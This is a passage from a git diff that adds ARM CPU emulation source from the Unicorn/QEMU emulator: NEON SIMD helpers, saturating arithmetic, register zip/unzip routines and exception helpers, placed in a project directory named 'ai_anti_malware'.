tmp; + uint64_t result; + DO_ABD(result, a, b, int16_t, int32_t); + DO_ABD(tmp, a >> 16, b >> 16, int16_t, int32_t); + return result | (tmp << 32); +} + +uint64_t HELPER(neon_abdl_u64)(uint32_t a, uint32_t b) +{ + uint64_t result; + DO_ABD(result, a, b, uint32_t, uint64_t); + return result; +} + +uint64_t HELPER(neon_abdl_s64)(uint32_t a, uint32_t b) +{ + uint64_t result; + DO_ABD(result, a, b, int32_t, int64_t); + return result; +} +#undef DO_ABD + +/* Widening multiply. Named type is the source type. */ +#define DO_MULL(dest, x, y, type1, type2) do { \ + type1 tmp_x = x; \ + type1 tmp_y = y; \ + dest = (type2)((int64_t)tmp_x * (int64_t)tmp_y); \ + } while(0) + +uint64_t HELPER(neon_mull_u8)(uint32_t a, uint32_t b) +{ + uint64_t tmp; + uint64_t result; + + DO_MULL(result, a, b, uint8_t, uint16_t); + DO_MULL(tmp, a >> 8, b >> 8, uint8_t, uint16_t); + result |= tmp << 16; + DO_MULL(tmp, a >> 16, b >> 16, uint8_t, uint16_t); + result |= tmp << 32; + DO_MULL(tmp, a >> 24, b >> 24, uint8_t, uint16_t); + result |= tmp << 48; + return result; +} + +uint64_t HELPER(neon_mull_s8)(uint32_t a, uint32_t b) +{ + uint64_t tmp; + uint64_t result; + + DO_MULL(result, a, b, int8_t, uint16_t); + DO_MULL(tmp, a >> 8, b >> 8, int8_t, uint16_t); + result |= tmp << 16; + DO_MULL(tmp, a >> 16, b >> 16, int8_t, uint16_t); + result |= tmp << 32; + DO_MULL(tmp, a >> 24, b >> 24, int8_t, uint16_t); + result |= tmp << 48; + return result; +} + +uint64_t HELPER(neon_mull_u16)(uint32_t a, uint32_t b) +{ + uint64_t tmp; + uint64_t result; + + DO_MULL(result, a, b, uint16_t, uint32_t); + DO_MULL(tmp, a >> 16, b >> 16, uint16_t, uint32_t); + return result | (tmp << 32); +} + +uint64_t HELPER(neon_mull_s16)(uint32_t a, uint32_t b) +{ + uint64_t tmp; + uint64_t result; + + DO_MULL(result, a, b, int16_t, uint32_t); + DO_MULL(tmp, a >> 16, b >> 16, int16_t, uint32_t); + return result | (tmp << 32); +} + +uint64_t HELPER(neon_negl_u16)(uint64_t x) +{ + uint16_t tmp; + uint64_t result; + result = (uint16_t)(0-x); + tmp = 0-(x >> 16); + result |= (uint64_t)tmp << 16; + tmp = 0-(x >> 32); + result |= (uint64_t)tmp << 32; + tmp = 0-(x >> 48); + result |= (uint64_t)tmp << 48; + return result; +} + +uint64_t HELPER(neon_negl_u32)(uint64_t x) +{ + uint32_t low = 0-x; + uint32_t high = 0-(x >> 32); + return low | ((uint64_t)high << 32); +} + +/* Saturating sign manipulation. */ +/* ??? Make these use NEON_VOP1 */ +#define DO_QABS8(x) do { \ + if (x == (int8_t)0x80) { \ + x = 0x7f; \ + SET_QC(); \ + } else if (x < 0) { \ + x = -x; \ + }} while (0) +uint32_t HELPER(neon_qabs_s8)(CPUARMState *env, uint32_t x) +{ + neon_s8 vec; + NEON_UNPACK(neon_s8, vec, x); + DO_QABS8(vec.v1); + DO_QABS8(vec.v2); + DO_QABS8(vec.v3); + DO_QABS8(vec.v4); + NEON_PACK(neon_s8, x, vec); + return x; +} +#undef DO_QABS8 + +#define DO_QNEG8(x) do { \ + if (x == (int8_t)0x80) { \ + x = 0x7f; \ + SET_QC(); \ + } else { \ + x = -x; \ + }} while (0) +uint32_t HELPER(neon_qneg_s8)(CPUARMState *env, uint32_t x) +{ + neon_s8 vec; + NEON_UNPACK(neon_s8, vec, x); + DO_QNEG8(vec.v1); + DO_QNEG8(vec.v2); + DO_QNEG8(vec.v3); + DO_QNEG8(vec.v4); + NEON_PACK(neon_s8, x, vec); + return x; +} +#undef DO_QNEG8 + +#define DO_QABS16(x) do { \ + if (x == (int16_t)0x8000) { \ + x = 0x7fff; \ + SET_QC(); \ + } else if (x < 0) { \ + x = -x; \ + }} while (0) +uint32_t HELPER(neon_qabs_s16)(CPUARMState *env, uint32_t x) +{ + neon_s16 vec; + NEON_UNPACK(neon_s16, vec, x); + DO_QABS16(vec.v1); + DO_QABS16(vec.v2); + NEON_PACK(neon_s16, x, vec); + return x; +} +#undef DO_QABS16 + +#define DO_QNEG16(x) do { \ + if (x == (int16_t)0x8000) { \ + x = 0x7fff; \ + SET_QC(); \ + } else { \ + x = -x; \ + }} while (0) +uint32_t HELPER(neon_qneg_s16)(CPUARMState *env, uint32_t x) +{ + neon_s16 vec; + NEON_UNPACK(neon_s16, vec, x); + DO_QNEG16(vec.v1); + DO_QNEG16(vec.v2); + NEON_PACK(neon_s16, x, vec); + return x; +} +#undef DO_QNEG16 + +uint32_t HELPER(neon_qabs_s32)(CPUARMState *env, uint32_t x) +{ + if (x == SIGNBIT) { + SET_QC(); + x = ~SIGNBIT; + } else if ((int32_t)x < 0) { + x = 0-x; + } + return x; +} + +uint32_t HELPER(neon_qneg_s32)(CPUARMState *env, uint32_t x) +{ + if (x == SIGNBIT) { + SET_QC(); + x = ~SIGNBIT; + } else { + x = 0-x; + } + return x; +} + +uint64_t HELPER(neon_qabs_s64)(CPUARMState *env, uint64_t x) +{ + if (x == SIGNBIT64) { + SET_QC(); + x = ~SIGNBIT64; + } else if ((int64_t)x < 0) { + x = 0-x; + } + return x; +} + +uint64_t HELPER(neon_qneg_s64)(CPUARMState *env, uint64_t x) +{ + if (x == SIGNBIT64) { + SET_QC(); + x = ~SIGNBIT64; + } else { + x = 0-x; + } + return x; +} + +/* NEON Float helpers. */ +uint32_t HELPER(neon_abd_f32)(uint32_t a, uint32_t b, void *fpstp) +{ + float_status *fpst = fpstp; + float32 f0 = make_float32(a); + float32 f1 = make_float32(b); + return float32_val(float32_abs(float32_sub(f0, f1, fpst))); +} + +/* Floating point comparisons produce an integer result. + * Note that EQ doesn't signal InvalidOp for QNaNs but GE and GT do. + * Softfloat routines return 0/1, which we convert to the 0/-1 Neon requires. + */ +uint32_t HELPER(neon_ceq_f32)(uint32_t a, uint32_t b, void *fpstp) +{ + float_status *fpst = fpstp; + return -float32_eq_quiet(make_float32(a), make_float32(b), fpst); +} + +uint32_t HELPER(neon_cge_f32)(uint32_t a, uint32_t b, void *fpstp) +{ + float_status *fpst = fpstp; + return -float32_le(make_float32(b), make_float32(a), fpst); +} + +uint32_t HELPER(neon_cgt_f32)(uint32_t a, uint32_t b, void *fpstp) +{ + float_status *fpst = fpstp; + return -float32_lt(make_float32(b), make_float32(a), fpst); +} + +uint32_t HELPER(neon_acge_f32)(uint32_t a, uint32_t b, void *fpstp) +{ + float_status *fpst = fpstp; + float32 f0 = float32_abs(make_float32(a)); + float32 f1 = float32_abs(make_float32(b)); + return -float32_le(f1, f0, fpst); +} + +uint32_t HELPER(neon_acgt_f32)(uint32_t a, uint32_t b, void *fpstp) +{ + float_status *fpst = fpstp; + float32 f0 = float32_abs(make_float32(a)); + float32 f1 = float32_abs(make_float32(b)); + return -float32_lt(f1, f0, fpst); +} + +uint64_t HELPER(neon_acge_f64)(uint64_t a, uint64_t b, void *fpstp) +{ + float_status *fpst = fpstp; + float64 f0 = float64_abs(make_float64(a)); + float64 f1 = float64_abs(make_float64(b)); + return -float64_le(f1, f0, fpst); +} + +uint64_t HELPER(neon_acgt_f64)(uint64_t a, uint64_t b, void *fpstp) +{ + float_status *fpst = fpstp; + float64 f0 = float64_abs(make_float64(a)); + float64 f1 = float64_abs(make_float64(b)); + return -float64_lt(f1, f0, fpst); +} + +#define ELEM(V, N, SIZE) (((V) >> ((N) * (SIZE))) & ((1ull << (SIZE)) - 1)) + +void HELPER(neon_qunzip8)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + uint64_t zm0 = float64_val(env->vfp.regs[rm]); + uint64_t zm1 = float64_val(env->vfp.regs[rm + 1]); + uint64_t zd0 = float64_val(env->vfp.regs[rd]); + uint64_t zd1 = float64_val(env->vfp.regs[rd + 1]); + uint64_t d0 = ELEM(zd0, 0, 8) | (ELEM(zd0, 2, 8) << 8) + | (ELEM(zd0, 4, 8) << 16) | (ELEM(zd0, 6, 8) << 24) + | (ELEM(zd1, 0, 8) << 32) | (ELEM(zd1, 2, 8) << 40) + | (ELEM(zd1, 4, 8) << 48) | (ELEM(zd1, 6, 8) << 56); + uint64_t d1 = ELEM(zm0, 0, 8) | (ELEM(zm0, 2, 8) << 8) + | (ELEM(zm0, 4, 8) << 16) | (ELEM(zm0, 6, 8) << 24) + | (ELEM(zm1, 0, 8) << 32) | (ELEM(zm1, 2, 8) << 40) + | (ELEM(zm1, 4, 8) << 48) | (ELEM(zm1, 6, 8) << 56); + uint64_t m0 = ELEM(zd0, 1, 8) | (ELEM(zd0, 3, 8) << 8) + | (ELEM(zd0, 5, 8) << 16) | (ELEM(zd0, 7, 8) << 24) + | (ELEM(zd1, 1, 8) << 32) | (ELEM(zd1, 3, 8) << 40) + | (ELEM(zd1, 5, 8) << 48) | (ELEM(zd1, 7, 8) << 56); + uint64_t m1 = ELEM(zm0, 1, 8) | (ELEM(zm0, 3, 8) << 8) + | (ELEM(zm0, 5, 8) << 16) | (ELEM(zm0, 7, 8) << 24) + | (ELEM(zm1, 1, 8) << 32) | (ELEM(zm1, 3, 8) << 40) + | (ELEM(zm1, 5, 8) << 48) | (ELEM(zm1, 7, 8) << 56); + env->vfp.regs[rm] = make_float64(m0); + env->vfp.regs[rm + 1] = make_float64(m1); + env->vfp.regs[rd] = make_float64(d0); + env->vfp.regs[rd + 1] = make_float64(d1); +} + +void HELPER(neon_qunzip16)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + uint64_t zm0 = float64_val(env->vfp.regs[rm]); + uint64_t zm1 = float64_val(env->vfp.regs[rm + 1]); + uint64_t zd0 = float64_val(env->vfp.regs[rd]); + uint64_t zd1 = float64_val(env->vfp.regs[rd + 1]); + uint64_t d0 = ELEM(zd0, 0, 16) | (ELEM(zd0, 2, 16) << 16) + | (ELEM(zd1, 0, 16) << 32) | (ELEM(zd1, 2, 16) << 48); + uint64_t d1 = ELEM(zm0, 0, 16) | (ELEM(zm0, 2, 16) << 16) + | (ELEM(zm1, 0, 16) << 32) | (ELEM(zm1, 2, 16) << 48); + uint64_t m0 = ELEM(zd0, 1, 16) | (ELEM(zd0, 3, 16) << 16) + | (ELEM(zd1, 1, 16) << 32) | (ELEM(zd1, 3, 16) << 48); + uint64_t m1 = ELEM(zm0, 1, 16) | (ELEM(zm0, 3, 16) << 16) + | (ELEM(zm1, 1, 16) << 32) | (ELEM(zm1, 3, 16) << 48); + env->vfp.regs[rm] = make_float64(m0); + env->vfp.regs[rm + 1] = make_float64(m1); + env->vfp.regs[rd] = make_float64(d0); + env->vfp.regs[rd + 1] = make_float64(d1); +} + +void HELPER(neon_qunzip32)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + uint64_t zm0 = float64_val(env->vfp.regs[rm]); + uint64_t zm1 = float64_val(env->vfp.regs[rm + 1]); + uint64_t zd0 = float64_val(env->vfp.regs[rd]); + uint64_t zd1 = float64_val(env->vfp.regs[rd + 1]); + uint64_t d0 = ELEM(zd0, 0, 32) | (ELEM(zd1, 0, 32) << 32); + uint64_t d1 = ELEM(zm0, 0, 32) | (ELEM(zm1, 0, 32) << 32); + uint64_t m0 = ELEM(zd0, 1, 32) | (ELEM(zd1, 1, 32) << 32); + uint64_t m1 = ELEM(zm0, 1, 32) | (ELEM(zm1, 1, 32) << 32); + env->vfp.regs[rm] = make_float64(m0); + env->vfp.regs[rm + 1] = make_float64(m1); + env->vfp.regs[rd] = make_float64(d0); + env->vfp.regs[rd + 1] = make_float64(d1); +} + +void HELPER(neon_unzip8)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + uint64_t zm = float64_val(env->vfp.regs[rm]); + uint64_t zd = float64_val(env->vfp.regs[rd]); + uint64_t d0 = ELEM(zd, 0, 8) | (ELEM(zd, 2, 8) << 8) + | (ELEM(zd, 4, 8) << 16) | (ELEM(zd, 6, 8) << 24) + | (ELEM(zm, 0, 8) << 32) | (ELEM(zm, 2, 8) << 40) + | (ELEM(zm, 4, 8) << 48) | (ELEM(zm, 6, 8) << 56); + uint64_t m0 = ELEM(zd, 1, 8) | (ELEM(zd, 3, 8) << 8) + | (ELEM(zd, 5, 8) << 16) | (ELEM(zd, 7, 8) << 24) + | (ELEM(zm, 1, 8) << 32) | (ELEM(zm, 3, 8) << 40) + | (ELEM(zm, 5, 8) << 48) | (ELEM(zm, 7, 8) << 56); + env->vfp.regs[rm] = make_float64(m0); + env->vfp.regs[rd] = make_float64(d0); +} + +void HELPER(neon_unzip16)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + uint64_t zm = float64_val(env->vfp.regs[rm]); + uint64_t zd = float64_val(env->vfp.regs[rd]); + uint64_t d0 = ELEM(zd, 0, 16) | (ELEM(zd, 2, 16) << 16) + | (ELEM(zm, 0, 16) << 32) | (ELEM(zm, 2, 16) << 48); + uint64_t m0 = ELEM(zd, 1, 16) | (ELEM(zd, 3, 16) << 16) + | (ELEM(zm, 1, 16) << 32) | (ELEM(zm, 3, 16) << 48); + env->vfp.regs[rm] = make_float64(m0); + env->vfp.regs[rd] = make_float64(d0); +} + +void HELPER(neon_qzip8)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + uint64_t zm0 = float64_val(env->vfp.regs[rm]); + uint64_t zm1 = float64_val(env->vfp.regs[rm + 1]); + uint64_t zd0 = float64_val(env->vfp.regs[rd]); + uint64_t zd1 = float64_val(env->vfp.regs[rd + 1]); + uint64_t d0 = ELEM(zd0, 0, 8) | (ELEM(zm0, 0, 8) << 8) + | (ELEM(zd0, 1, 8) << 16) | (ELEM(zm0, 1, 8) << 24) + | (ELEM(zd0, 2, 8) << 32) | (ELEM(zm0, 2, 8) << 40) + | (ELEM(zd0, 3, 8) << 48) | (ELEM(zm0, 3, 8) << 56); + uint64_t d1 = ELEM(zd0, 4, 8) | (ELEM(zm0, 4, 8) << 8) + | (ELEM(zd0, 5, 8) << 16) | (ELEM(zm0, 5, 8) << 24) + | (ELEM(zd0, 6, 8) << 32) | (ELEM(zm0, 6, 8) << 40) + | (ELEM(zd0, 7, 8) << 48) | (ELEM(zm0, 7, 8) << 56); + uint64_t m0 = ELEM(zd1, 0, 8) | (ELEM(zm1, 0, 8) << 8) + | (ELEM(zd1, 1, 8) << 16) | (ELEM(zm1, 1, 8) << 24) + | (ELEM(zd1, 2, 8) << 32) | (ELEM(zm1, 2, 8) << 40) + | (ELEM(zd1, 3, 8) << 48) | (ELEM(zm1, 3, 8) << 56); + uint64_t m1 = ELEM(zd1, 4, 8) | (ELEM(zm1, 4, 8) << 8) + | (ELEM(zd1, 5, 8) << 16) | (ELEM(zm1, 5, 8) << 24) + | (ELEM(zd1, 6, 8) << 32) | (ELEM(zm1, 6, 8) << 40) + | (ELEM(zd1, 7, 8) << 48) | (ELEM(zm1, 7, 8) << 56); + env->vfp.regs[rm] = make_float64(m0); + env->vfp.regs[rm + 1] = make_float64(m1); + env->vfp.regs[rd] = make_float64(d0); + env->vfp.regs[rd + 1] = make_float64(d1); +} + +void HELPER(neon_qzip16)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + uint64_t zm0 = float64_val(env->vfp.regs[rm]); + uint64_t zm1 = float64_val(env->vfp.regs[rm + 1]); + uint64_t zd0 = float64_val(env->vfp.regs[rd]); + uint64_t zd1 = float64_val(env->vfp.regs[rd + 1]); + uint64_t d0 = ELEM(zd0, 0, 16) | (ELEM(zm0, 0, 16) << 16) + | (ELEM(zd0, 1, 16) << 32) | (ELEM(zm0, 1, 16) << 48); + uint64_t d1 = ELEM(zd0, 2, 16) | (ELEM(zm0, 2, 16) << 16) + | (ELEM(zd0, 3, 16) << 32) | (ELEM(zm0, 3, 16) << 48); + uint64_t m0 = ELEM(zd1, 0, 16) | (ELEM(zm1, 0, 16) << 16) + | (ELEM(zd1, 1, 16) << 32) | (ELEM(zm1, 1, 16) << 48); + uint64_t m1 = ELEM(zd1, 2, 16) | (ELEM(zm1, 2, 16) << 16) + | (ELEM(zd1, 3, 16) << 32) | (ELEM(zm1, 3, 16) << 48); + env->vfp.regs[rm] = make_float64(m0); + env->vfp.regs[rm + 1] = make_float64(m1); + env->vfp.regs[rd] = make_float64(d0); + env->vfp.regs[rd + 1] = make_float64(d1); +} + +void HELPER(neon_qzip32)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + uint64_t zm0 = float64_val(env->vfp.regs[rm]); + uint64_t zm1 = float64_val(env->vfp.regs[rm + 1]); + uint64_t zd0 = float64_val(env->vfp.regs[rd]); + uint64_t zd1 = float64_val(env->vfp.regs[rd + 1]); + uint64_t d0 = ELEM(zd0, 0, 32) | (ELEM(zm0, 0, 32) << 32); + uint64_t d1 = ELEM(zd0, 1, 32) | (ELEM(zm0, 1, 32) << 32); + uint64_t m0 = ELEM(zd1, 0, 32) | (ELEM(zm1, 0, 32) << 32); + uint64_t m1 = ELEM(zd1, 1, 32) | (ELEM(zm1, 1, 32) << 32); + env->vfp.regs[rm] = make_float64(m0); + env->vfp.regs[rm + 1] = make_float64(m1); + env->vfp.regs[rd] = make_float64(d0); + env->vfp.regs[rd + 1] = make_float64(d1); +} + +void HELPER(neon_zip8)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + uint64_t zm = float64_val(env->vfp.regs[rm]); + uint64_t zd = float64_val(env->vfp.regs[rd]); + uint64_t d0 = ELEM(zd, 0, 8) | (ELEM(zm, 0, 8) << 8) + | (ELEM(zd, 1, 8) << 16) | (ELEM(zm, 1, 8) << 24) + | (ELEM(zd, 2, 8) << 32) | (ELEM(zm, 2, 8) << 40) + | (ELEM(zd, 3, 8) << 48) | (ELEM(zm, 3, 8) << 56); + uint64_t m0 = ELEM(zd, 4, 8) | (ELEM(zm, 4, 8) << 8) + | (ELEM(zd, 5, 8) << 16) | (ELEM(zm, 5, 8) << 24) + | (ELEM(zd, 6, 8) << 32) | (ELEM(zm, 6, 8) << 40) + | (ELEM(zd, 7, 8) << 48) | (ELEM(zm, 7, 8) << 56); + env->vfp.regs[rm] = make_float64(m0); + env->vfp.regs[rd] = make_float64(d0); +} + +void HELPER(neon_zip16)(CPUARMState *env, uint32_t rd, uint32_t rm) +{ + uint64_t zm = float64_val(env->vfp.regs[rm]); + uint64_t zd = float64_val(env->vfp.regs[rd]); + uint64_t d0 = ELEM(zd, 0, 16) | (ELEM(zm, 0, 16) << 16) + | (ELEM(zd, 1, 16) << 32) | (ELEM(zm, 1, 16) << 48); + uint64_t m0 = ELEM(zd, 2, 16) | (ELEM(zm, 2, 16) << 16) + | (ELEM(zd, 3, 16) << 32) | (ELEM(zm, 3, 16) << 48); + env->vfp.regs[rm] = make_float64(m0); + env->vfp.regs[rd] = make_float64(d0); +} + +/* Helper function for 64 bit polynomial multiply case: + * perform PolynomialMult(op1, op2) and return either the top or + * bottom half of the 128 bit result. + */ +uint64_t HELPER(neon_pmull_64_lo)(uint64_t op1, uint64_t op2) +{ + int bitnum; + uint64_t res = 0; + + for (bitnum = 0; bitnum < 64; bitnum++) { + if (op1 & (1ULL << bitnum)) { + res ^= op2 << bitnum; + } + } + return res; +} +uint64_t HELPER(neon_pmull_64_hi)(uint64_t op1, uint64_t op2) +{ + int bitnum; + uint64_t res = 0; + + /* bit 0 of op1 can't influence the high 64 bits at all */ + for (bitnum = 1; bitnum < 64; bitnum++) { + if (op1 & (1ULL << bitnum)) { + res ^= op2 >> (64 - bitnum); + } + } + return res; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/op_addsub.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/op_addsub.h new file mode 100644 index 0000000..ca4a189 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/op_addsub.h @@ -0,0 +1,103 @@ +/* + * ARMv6 integer SIMD operations. + * + * Copyright (c) 2007 CodeSourcery. + * Written by Paul Brook + * + * This code is licensed under the GPL. + */ + +#ifdef ARITH_GE +#define GE_ARG , void *gep +#define DECLARE_GE uint32_t ge = 0 +#define SET_GE *(uint32_t *)gep = ge +#else +#define GE_ARG +#define DECLARE_GE do{}while(0) +#define SET_GE do{}while(0) +#endif + +#define RESULT(val, n, width) \ + res |= ((uint32_t)(glue(glue(uint,width),_t))(val)) << (n * width) + +uint32_t HELPER(glue(PFX,add16))(uint32_t a, uint32_t b GE_ARG) +{ + uint32_t res = 0; + DECLARE_GE; + + ADD16(a, b, 0); + ADD16(a >> 16, b >> 16, 1); + SET_GE; + return res; +} + +uint32_t HELPER(glue(PFX,add8))(uint32_t a, uint32_t b GE_ARG) +{ + uint32_t res = 0; + DECLARE_GE; + + ADD8(a, b, 0); + ADD8(a >> 8, b >> 8, 1); + ADD8(a >> 16, b >> 16, 2); + ADD8(a >> 24, b >> 24, 3); + SET_GE; + return res; +} + +uint32_t HELPER(glue(PFX,sub16))(uint32_t a, uint32_t b GE_ARG) +{ + uint32_t res = 0; + DECLARE_GE; + + SUB16(a, b, 0); + SUB16(a >> 16, b >> 16, 1); + SET_GE; + return res; +} + +uint32_t HELPER(glue(PFX,sub8))(uint32_t a, uint32_t b GE_ARG) +{ + uint32_t res = 0; + DECLARE_GE; + + SUB8(a, b, 0); + SUB8(a >> 8, b >> 8, 1); + SUB8(a >> 16, b >> 16, 2); + SUB8(a >> 24, b >> 24, 3); + SET_GE; + return res; +} + +uint32_t HELPER(glue(PFX,subaddx))(uint32_t a, uint32_t b GE_ARG) +{ + uint32_t res = 0; + DECLARE_GE; + + ADD16(a, b >> 16, 0); + SUB16(a >> 16, b, 1); + SET_GE; + return res; +} + +uint32_t HELPER(glue(PFX,addsubx))(uint32_t a, uint32_t b GE_ARG) +{ + uint32_t res = 0; + DECLARE_GE; + + SUB16(a, b >> 16, 0); + ADD16(a >> 16, b, 1); + SET_GE; + return res; +} + +#undef GE_ARG +#undef DECLARE_GE +#undef SET_GE +#undef RESULT + +#undef ARITH_GE +#undef PFX +#undef ADD16 +#undef SUB16 +#undef ADD8 +#undef SUB8 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/op_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/op_helper.c new file mode 100644 index 0000000..4e28af7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/op_helper.c @@ -0,0 +1,842 @@ +/* + * ARM helper routines + * + * Copyright (c) 2005-2007 CodeSourcery, LLC + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ +#include "cpu.h" +#include "exec/helper-proto.h" +#include "internals.h" +#include "exec/cpu_ldst.h" + +#define SIGNBIT (uint32_t)0x80000000 +#define SIGNBIT64 ((uint64_t)1 << 63) + +static void raise_exception(CPUARMState *env, int tt) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + CPUState *cs = CPU(cpu); + + cs->exception_index = tt; + cpu_loop_exit(cs); +} + +uint32_t HELPER(neon_tbl)(CPUARMState *env, uint32_t ireg, uint32_t def, + uint32_t rn, uint32_t maxindex) +{ + uint32_t val; + uint32_t tmp; + int index; + int shift; + uint64_t *table; + table = (uint64_t *)&env->vfp.regs[rn]; + val = 0; + for (shift = 0; shift < 32; shift += 8) { + index = (ireg >> shift) & 0xff; + if (index < maxindex) { + tmp = (table[index >> 3] >> ((index & 7) << 3)) & 0xff; + val |= tmp << shift; + } else { + val |= def & (0xffU << shift); + } + } + return val; +} + +#if !defined(CONFIG_USER_ONLY) + +/* try to fill the TLB and return an exception if error. If retaddr is + * NULL, it means that the function was called in C code (i.e. not + * from generated code or from helper.c) + */ +void tlb_fill(CPUState *cs, target_ulong addr, int is_write, int mmu_idx, + uintptr_t retaddr) +{ + int ret; + + ret = arm_cpu_handle_mmu_fault(cs, addr, is_write, mmu_idx); + if (unlikely(ret)) { + ARMCPU *cpu = ARM_CPU(cs->uc, cs); + CPUARMState *env = &cpu->env; + + if (retaddr) { + /* now we have a real cpu fault */ + cpu_restore_state(cs, retaddr); + } + raise_exception(env, cs->exception_index); + } +} +#endif + +uint32_t HELPER(add_setq)(CPUARMState *env, uint32_t a, uint32_t b) +{ + uint32_t res = a + b; + if (((res ^ a) & SIGNBIT) && !((a ^ b) & SIGNBIT)) + env->QF = 1; + return res; +} + +uint32_t HELPER(add_saturate)(CPUARMState *env, uint32_t a, uint32_t b) +{ + uint32_t res = a + b; + if (((res ^ a) & SIGNBIT) && !((a ^ b) & SIGNBIT)) { + env->QF = 1; + res = ~(((int32_t)a >> 31) ^ SIGNBIT); + } + return res; +} + +uint32_t HELPER(sub_saturate)(CPUARMState *env, uint32_t a, uint32_t b) +{ + uint32_t res = a - b; + if (((res ^ a) & SIGNBIT) && ((a ^ b) & SIGNBIT)) { + env->QF = 1; + res = ~(((int32_t)a >> 31) ^ SIGNBIT); + } + return res; +} + +uint32_t HELPER(double_saturate)(CPUARMState *env, int32_t val) +{ + uint32_t res; + if (val >= 0x40000000) { + res = ~SIGNBIT; + env->QF = 1; + } else if (val <= (int32_t)0xc0000000) { + res = SIGNBIT; + env->QF = 1; + } else { + res = (uint32_t)val << 1; + } + return res; +} + +uint32_t HELPER(add_usaturate)(CPUARMState *env, uint32_t a, uint32_t b) +{ + uint32_t res = a + b; + if (res < a) { + env->QF = 1; + res = ~0; + } + return res; +} + +uint32_t HELPER(sub_usaturate)(CPUARMState *env, uint32_t a, uint32_t b) +{ + uint32_t res = a - b; + if (res > a) { + env->QF = 1; + res = 0; + } + return res; +} + +/* Signed saturation. */ +static inline uint32_t do_ssat(CPUARMState *env, int32_t val, int shift) +{ + int32_t top; + uint32_t mask; + + top = val >> shift; + mask = (1u << shift) - 1; + if (top > 0) { + env->QF = 1; + return mask; + } else if (top < -1) { + env->QF = 1; + return ~mask; + } + return val; +} + +/* Unsigned saturation. */ +static inline uint32_t do_usat(CPUARMState *env, int32_t val, int shift) +{ + uint32_t max; + + max = (1u << shift) - 1; + if (val < 0) { + env->QF = 1; + return 0; + } else if (val > max) { + env->QF = 1; + return max; + } + return val; +} + +/* Signed saturate. */ +uint32_t HELPER(ssat)(CPUARMState *env, uint32_t x, uint32_t shift) +{ + return do_ssat(env, x, shift); +} + +/* Dual halfword signed saturate. */ +uint32_t HELPER(ssat16)(CPUARMState *env, uint32_t x, uint32_t shift) +{ + uint32_t res; + + res = (uint16_t)do_ssat(env, (int16_t)x, shift); + res |= do_ssat(env, ((int32_t)x) >> 16, shift) << 16; + return res; +} + +/* Unsigned saturate. */ +uint32_t HELPER(usat)(CPUARMState *env, uint32_t x, uint32_t shift) +{ + return do_usat(env, x, shift); +} + +/* Dual halfword unsigned saturate. */ +uint32_t HELPER(usat16)(CPUARMState *env, uint32_t x, uint32_t shift) +{ + uint32_t res; + + res = (uint16_t)do_usat(env, (int16_t)x, shift); + res |= do_usat(env, ((int32_t)x) >> 16, shift) << 16; + return res; +} + +void HELPER(wfi)(CPUARMState *env) +{ + CPUState *cs = CPU(arm_env_get_cpu(env)); + + cs->exception_index = EXCP_HLT; + cs->halted = 1; + cpu_loop_exit(cs); +} + +void HELPER(wfe)(CPUARMState *env) +{ + CPUState *cs = CPU(arm_env_get_cpu(env)); + + /* Don't actually halt the CPU, just yield back to top + * level loop + */ + cs->exception_index = EXCP_YIELD; + cpu_loop_exit(cs); +} + +/* Raise an internal-to-QEMU exception. This is limited to only + * those EXCP values which are special cases for QEMU to interrupt + * execution and not to be used for exceptions which are passed to + * the guest (those must all have syndrome information and thus should + * use exception_with_syndrome). + */ +void HELPER(exception_internal)(CPUARMState *env, uint32_t excp) +{ + CPUState *cs = CPU(arm_env_get_cpu(env)); + + assert(excp_is_internal(excp)); + cs->exception_index = excp; + cpu_loop_exit(cs); +} + +/* Raise an exception with the specified syndrome register value */ +void HELPER(exception_with_syndrome)(CPUARMState *env, uint32_t excp, + uint32_t syndrome) +{ + CPUState *cs = CPU(arm_env_get_cpu(env)); + + assert(!excp_is_internal(excp)); + cs->exception_index = excp; // qq + env->exception.syndrome = syndrome; + cpu_loop_exit(cs); +} + +uint32_t HELPER(cpsr_read)(CPUARMState *env) +{ + return cpsr_read(env) & ~(CPSR_EXEC | CPSR_RESERVED); +} + +void HELPER(cpsr_write)(CPUARMState *env, uint32_t val, uint32_t mask) +{ + cpsr_write(env, val, mask); +} + +/* Access to user mode registers from privileged modes. */ +uint32_t HELPER(get_user_reg)(CPUARMState *env, uint32_t regno) +{ + uint32_t val; + + if (regno == 13) { + val = env->banked_r13[0]; + } else if (regno == 14) { + val = env->banked_r14[0]; + } else if (regno >= 8 + && (env->uncached_cpsr & 0x1f) == ARM_CPU_MODE_FIQ) { + val = env->usr_regs[regno - 8]; + } else { + val = env->regs[regno]; + } + return val; +} + +void HELPER(set_user_reg)(CPUARMState *env, uint32_t regno, uint32_t val) +{ + if (regno == 13) { + env->banked_r13[0] = val; + } else if (regno == 14) { + env->banked_r14[0] = val; + } else if (regno >= 8 + && (env->uncached_cpsr & 0x1f) == ARM_CPU_MODE_FIQ) { + env->usr_regs[regno - 8] = val; + } else { + env->regs[regno] = val; + } +} + +void HELPER(access_check_cp_reg)(CPUARMState *env, void *rip, uint32_t syndrome) +{ + const ARMCPRegInfo *ri = rip; + + if (arm_feature(env, ARM_FEATURE_XSCALE) && ri->cp < 14 + && extract32(env->cp15.c15_cpar, ri->cp, 1) == 0) { + env->exception.syndrome = syndrome; + 